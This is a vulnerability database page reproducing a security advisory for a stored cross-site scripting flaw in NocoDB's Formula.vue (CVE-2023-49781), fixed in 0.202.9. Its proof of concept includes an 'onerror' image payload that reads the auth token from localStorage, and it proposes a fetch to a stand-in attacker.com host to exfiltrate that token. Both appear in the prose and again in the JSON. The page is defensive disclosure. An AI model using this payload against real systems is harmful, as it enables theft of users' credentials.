GHSA-H6R4-XVW6-JC5H

Vulnerability from github – Published: 2024-05-13 19:59 – Updated: 2025-08-21 19:15
VLAI?
Summary
NocoDB Vulnerable to Stored Cross-Site Scripting in Formula.vue
Details

Summary

A stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality.

Details

The nc-gui/components/virtual-cell/Formula.vue displays a v-html tag with the value of "urls" whose contents are processed by the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag with href=XXX. However, it leaves all the other contents outside of the pattern URI::(XXX) unchanged, which makes the evil users can create a malicious table with a formula field whose payload is <img src=1 onerror="malicious javascripts"URI::(XXX). The evil users then can share this table with others by enabling public viewing and the victims who open the shared link can be attacked.

PoC

Step 1: Attacker login the nocodb and creates a table with two fields, "T" and "F". The type of field "T" is "SingleLineText", and the type of the "F" is "Fomula" with the formula content {T} Step 2: The attacker sets the contents of T using <img src=1 onerror=alert(localStorage.getItem('nocodb-gui-v2'))URI::(XXX) Step 3: The attacker clicks the "Share" button and enables public viewing, then copies the shared link and sends it to the victims Step 4: Any victims who open the shared link in their browsers will see the alert with their confidential tokens stored in localStorage

The attackers can use the fetch(http://attacker.com/?localStorage.getItem('nocodb-gui-v2')) to replace the alert and then steal the victims' credentials in their attacker.com website.

Impact

Stealing the credentials of NocoDB user that clicks the malicious link.

Severity ?
7.3 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.202.8"
      },
      "package": {
        "ecosystem": "npm",
        "name": "nocodb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.202.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-49781"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-05-13T19:59:07Z",
    "nvd_published_at": "2024-05-14T14:06:05Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality.\n\n### Details\nThe nc-gui/components/virtual-cell/Formula.vue displays a v-html tag with the value of \"urls\" whose contents are processed by the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag \u003ca\u003e with href=XXX. However, it leaves all the other contents outside of the pattern URI::(XXX) unchanged, which makes the evil users can create a malicious table with a formula field whose payload is \u003cimg src=1 onerror=\"malicious javascripts\"URI::(XXX). The evil users then can share this table with others by enabling public viewing and the victims who open the shared link can be attacked.\n\n### PoC\nStep 1: Attacker login the nocodb and creates a table with two fields, \"T\" and \"F\". The type of field \"T\" is \"SingleLineText\", and the type of the \"F\" is \"Fomula\" with the formula content {T}\nStep 2: The attacker sets the contents of T using \u003cimg src=1 onerror=alert(localStorage.getItem(\u0027nocodb-gui-v2\u0027))URI::(XXX)\nStep 3: The attacker clicks the \"Share\" button and enables public viewing, then copies the shared link and sends it to the victims\nStep 4: Any victims who open the shared link in their browsers will see the alert with their confidential tokens stored in localStorage\n\nThe attackers can use the fetch([http://attacker.com/?localStorage.getItem(\u0027nocodb-gui-v2\u0027)](http://attacker.com/?localStorage.getItem(%27nocodb-gui-v2%27))) to replace the alert and then steal the victims\u0027 credentials in their attacker.com website.\n\n### Impact\nStealing the credentials of NocoDB user that clicks the malicious link.",
  "id": "GHSA-h6r4-xvw6-jc5h",
  "modified": "2025-08-21T19:15:36Z",
  "published": "2024-05-13T19:59:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nocodb/nocodb/security/advisories/GHSA-h6r4-xvw6-jc5h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49781"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nocodb/nocodb/commit/7f58ce3726dfec71537d8b80474a0f95a48a1574"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nocodb/nocodb"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "NocoDB Vulnerable to Stored Cross-Site Scripting in Formula.vue"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.